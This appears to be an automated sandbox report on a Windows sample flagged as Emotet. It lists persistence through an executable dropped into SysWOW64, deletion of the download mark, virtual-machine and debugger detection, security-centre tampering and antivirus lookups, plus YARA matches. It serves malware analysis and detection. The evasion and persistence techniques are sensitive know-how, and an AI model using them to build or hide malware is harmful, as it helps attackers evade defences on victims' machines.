Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A17DDE push ecx; mov dword ptr [esp], 00008F23h 0_2_02A17DDF
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A17D1E push ecx; mov dword ptr [esp], 0000D106h 0_2_02A17D1F
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A17D6E push ecx; mov dword ptr [esp], 00004B56h 0_2_02A17D6F
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A17D4E push ecx; mov dword ptr [esp], 000003A6h 0_2_02A17D4F
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB60F0 push ecx; mov dword ptr [esp], 0000A172h 3_2_00FB60F1
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB62D0 push ecx; mov dword ptr [esp], 00001969h 3_2_00FB62D1
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB61D0 push ecx; mov dword ptr [esp], 00004B56h 3_2_00FB61D1
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB61B0 push ecx; mov dword ptr [esp], 000003A6h 3_2_00FB61B1
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB62A0 push ecx; mov dword ptr [esp], 0000BFAAh 3_2_00FB62A1

Persistence and Installation Behavior:

barindex
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Executable created and started: C:\Windows\SysWOW64\msaatext\powercpl.exe Jump to behavior
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Executable created and started: C:\Windows\SysWOW64\msaatext\powercpl.exe Jump to behavior
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe PE file moved: C:\Windows\SysWOW64\msaatext\powercpl.exe Jump to behavior
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe PE file moved: C:\Windows\SysWOW64\msaatext\powercpl.exe Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe File opened: C:\Windows\SysWOW64\msaatext\powercpl.exe:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe File opened: C:\Windows\SysWOW64\msaatext\powercpl.exe:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains functionality to enumerate running services
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: ChangeServiceConfig2W,RtlAllocateHeap,RtlAllocateHeap,QueryServiceConfig2W,CloseServiceHandle,EnumServicesStatusExW,GetTickCount,RtlAllocateHeap,RtlAllocateHeap,HeapFree,RtlFreeHeap, 0_2_02BB5390
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: ChangeServiceConfig2W,RtlAllocateHeap,RtlAllocateHeap,QueryServiceConfig2W,CloseServiceHandle,EnumServicesStatusExW,GetTickCount,RtlAllocateHeap,RtlAllocateHeap,HeapFree,RtlFreeHeap, 0_2_02BB5390
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\svchost.exe TID: 1056 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1056 Thread sleep time: -30000s >= -30000s Jump to behavior
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0 Jump to behavior
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB3A20 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,HeapFree,FindClose, 0_2_02BB3A20
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB3A20 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,HeapFree,FindClose, 0_2_02BB3A20
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB3A20 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,HeapFree,FindClose, 3_2_00FB3A20
Source: svchost.exe, 00000005.00000002.485635855.000002062F865000.00000004.00000001.sdmp Binary or memory string: "@Hyper-V RAW
Source: svchost.exe, 00000006.00000002.277289531.000001ABBA340000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.293337185.0000021B02940000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.483594205.000001F61B140000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 00000008.00000002.481907201.00000200AC202000.00000004.00000001.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: powercpl.exe, 00000003.00000002.483651764.0000000002B74000.00000004.00000001.sdmp, svchost.exe, 00000005.00000002.485482257.000002062F84E000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000001.00000002.476544634.0000020902829000.00000004.00000001.sdmp Binary or memory string: hgFs f
Source: svchost.exe, 00000006.00000002.277289531.000001ABBA340000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.293337185.0000021B02940000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.483594205.000001F61B140000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000006.00000002.277289531.000001ABBA340000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.293337185.0000021B02940000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.483594205.000001F61B140000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 00000008.00000002.482016332.00000200AC240000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.482207926.000001F61A43E000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.482632985.00000170D5E2A000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000006.00000002.277289531.000001ABBA340000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.293337185.0000021B02940000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.483594205.000001F61B140000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: svchost.exe, 00000005.00000002.485635855.000002062F865000.00000004.00000001.sdmp Binary or memory string: "@Hyper-V RAW
Source: svchost.exe, 00000006.00000002.277289531.000001ABBA340000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.293337185.0000021B02940000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.483594205.000001F61B140000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 00000008.00000002.481907201.00000200AC202000.00000004.00000001.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: powercpl.exe, 00000003.00000002.483651764.0000000002B74000.00000004.00000001.sdmp, svchost.exe, 00000005.00000002.485482257.000002062F84E000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000001.00000002.476544634.0000020902829000.00000004.00000001.sdmp Binary or memory string: hgFs f
Source: svchost.exe, 00000006.00000002.277289531.000001ABBA340000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.293337185.0000021B02940000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.483594205.000001F61B140000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000006.00000002.277289531.000001ABBA340000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.293337185.0000021B02940000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.483594205.000001F61B140000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 00000008.00000002.482016332.00000200AC240000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.482207926.000001F61A43E000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.482632985.00000170D5E2A000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000006.00000002.277289531.000001ABBA340000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.293337185.0000021B02940000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.483594205.000001F61B140000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02B71030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError, 0_2_02B71030
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02B71030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError, 0_2_02B71030
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB4190 mov eax, dword ptr fs:[00000030h] 0_2_02BB4190
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB5140 mov eax, dword ptr fs:[00000030h] 0_2_02BB5140
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A16CDE mov eax, dword ptr fs:[00000030h] 0_2_02A16CDE
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A10456 mov eax, dword ptr fs:[00000030h] 0_2_02A10456
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A15D2E mov eax, dword ptr fs:[00000030h] 0_2_02A15D2E
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A1095E mov eax, dword ptr fs:[00000030h] 0_2_02A1095E
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02B71030 mov eax, dword ptr fs:[00000030h] 0_2_02B71030
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB4190 mov eax, dword ptr fs:[00000030h] 0_2_02BB4190
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB5140 mov eax, dword ptr fs:[00000030h] 0_2_02BB5140
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A16CDE mov eax, dword ptr fs:[00000030h] 0_2_02A16CDE
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A10456 mov eax, dword ptr fs:[00000030h] 0_2_02A10456
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A15D2E mov eax, dword ptr fs:[00000030h] 0_2_02A15D2E
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A1095E mov eax, dword ptr fs:[00000030h] 0_2_02A1095E
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02B71030 mov eax, dword ptr fs:[00000030h] 0_2_02B71030
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB4190 mov eax, dword ptr fs:[00000030h] 3_2_00FB4190
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB5140 mov eax, dword ptr fs:[00000030h] 3_2_00FB5140
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00E06CDE mov eax, dword ptr fs:[00000030h] 3_2_00E06CDE
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00E00456 mov eax, dword ptr fs:[00000030h] 3_2_00E00456
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00E0095E mov eax, dword ptr fs:[00000030h] 3_2_00E0095E
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00E05D2E mov eax, dword ptr fs:[00000030h] 3_2_00E05D2E
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00F71030 mov eax, dword ptr fs:[00000030h] 3_2_00F71030
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02B71030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError, 0_2_02B71030
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02B71030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError, 0_2_02B71030
Source: powercpl.exe, 00000003.00000002.483392490.00000000015D0000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.482915686.000001451EF90000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: powercpl.exe, 00000003.00000002.483392490.00000000015D0000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.482915686.000001451EF90000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: powercpl.exe, 00000003.00000002.483392490.00000000015D0000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.482915686.000001451EF90000.00000002.00000001.sdmp Binary or memory string: Progman
Source: powercpl.exe, 00000003.00000002.483392490.00000000015D0000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.482915686.000001451EF90000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: powercpl.exe, 00000003.00000002.483392490.00000000015D0000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.482915686.000001451EF90000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: powercpl.exe, 00000003.00000002.483392490.00000000015D0000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.482915686.000001451EF90000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: powercpl.exe, 00000003.00000002.483392490.00000000015D0000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.482915686.000001451EF90000.00000002.00000001.sdmp Binary or memory string: Progman
Source: powercpl.exe, 00000003.00000002.483392490.00000000015D0000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.482915686.000001451EF90000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB5720 RtlGetVersion,GetNativeSystemInfo,GetNativeSystemInfo, 3_2_00FB5720
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB5720 RtlGetVersion,GetNativeSystemInfo,GetNativeSystemInfo, 3_2_00FB5720
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval Jump to behavior
Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval Jump to behavior
AV process strings found (often used to terminate AV products)
Source: svchost.exe, 0000000E.00000002.482385045.00000260AE240000.00000004.00000001.sdmp Binary or memory string: (@\REGISTRY\USER\S-1-5-19ws Defender\MsMpeng.exe
Source: svchost.exe, 0000000E.00000002.482538089.00000260AE302000.00000004.00000001.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000E.00000002.482385045.00000260AE240000.00000004.00000001.sdmp Binary or memory string: (@\REGISTRY\USER\S-1-5-19ws Defender\MsMpeng.exe
Source: svchost.exe, 0000000E.00000002.482538089.00000260AE302000.00000004.00000001.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Stealing of Sensitive Information:

barindex
Yara detected Emotet
Source: Yara match File source: 00000003.00000002.482882849.0000000000FB1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.482751188.0000000000F74000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.220540137.0000000002A10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.482632902.0000000000E00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.220611938.0000000002BB1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.220584249.0000000002B74000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 3.2.powercpl.exe.fb0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.lHuFdWpoMA.exe.2bb0000.1.unpack, type: UNPACKEDPE